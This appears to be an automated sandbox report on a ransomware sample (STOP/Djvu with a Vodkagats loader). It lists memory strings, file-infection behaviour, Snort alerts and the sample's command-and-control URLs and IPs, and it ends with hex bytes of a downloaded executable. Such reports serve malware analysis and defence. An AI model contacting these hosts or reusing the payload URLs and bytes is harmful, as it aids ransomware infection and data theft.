Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s\ source: R5391762lf.exe, 00000007.00000003.1948567038.0000000003699000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049541715.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\d.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ngs\ source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ta\5 source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\re\ source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Y source: R5391762lf.exe, 00000007.00000003.2160881212.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\BlB- source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\wy\ion Data\Application Data\Application Data\Microsoft\input\en-ZW\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\\T source: R5391762lf.exe, 00000007.00000003.2079190952.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078852071.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083952112.000000000346D000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: load_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\M source: R5391762lf.exe, 00000007.00000003.2099831348.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101510258.000000000370A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2081263289.000000000373B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946934767.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100414663.0000000003703000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102557757.0000000003712000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\AC\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\H\* source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: QNBBNQ~1.BGJQNBBNqWD9F_Blep-UqQSqnMp-FI[1].css.bgjs06avERkAqfuwcXY6H5w8dtNc[1].css.bgjst44F3556BE808F99573969118A8E36879BA1ADA6Ction Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\db source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ata\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\ source: R5391762lf.exe, 00000007.00000003.2080570314.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078665185.0000000003491000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2103034298.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098976504.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080800658.00000000034DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*F source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\MSO source: R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\te\ source: R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y\\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s\U source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2082039763.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\P source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\\ source: R5391762lf.exe, 00000007.00000003.2066700717.000000000319C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\D source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Y' source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\^ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\R5391762lf.exe

System file written: C:\Users\user\AppData\Local\Temp\chrome.exe

Jump to behavior

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_00410160
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_0040F730
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	2_2_0040FB98

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.8:49710 -> 186.145.236.18:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.8:49708 -> 186.13.17.220:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.8:49708 -> 186.13.17.220:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 186.145.236.18:80 -> 192.168.2.8:49710
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 186.145.236.18:80 -> 192.168.2.8:49709
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.8:49711 -> 186.145.236.18:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.8:49711 -> 186.145.236.18:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199673019888
Source: Malware configuration extractor	URLs: http://cajgtus.com/test1/get.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 15:37:11 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 